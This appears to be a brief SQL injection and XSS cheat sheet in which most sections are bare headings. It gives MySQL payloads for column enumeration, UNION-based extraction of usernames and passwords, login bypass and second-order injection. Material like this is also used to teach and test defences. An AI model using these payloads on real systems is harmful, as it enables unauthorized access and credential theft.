SQL Injection & XSS Playground
Classic SQL Injection
Union Select Data Extraction
mysql> select * from users where user_id = 1 order by 7;
ERROR 1054 (42S22): Unknown column '7' in 'order clause'
mysql> select * from users where user_id = 1 order by 6;
mysql> select * from users where user_id = 1 union select 1,2,3,4,5,6;select * from users where user_id = 1 union all select 1,(select group_concat(user,0x3a,password) from users),3,4,5,6;Authentication Bypass
mysql> select * from users where user='admin' and password='blah' or 1 # 5f4dcc3b5aa765d61d8327deb882cf99' Second Order Injection
mysql> insert into accounts (username, password, mysignature) values ('admin','mynewpass',(select user())) # 'mynewsignature');Dropping a Backdoor
Conditional Select
Bypassing Whitespace Filtering
Time Based SQL Injection
Sleep Invokation
XSS
Strtoupper Bypass
References
Last updated












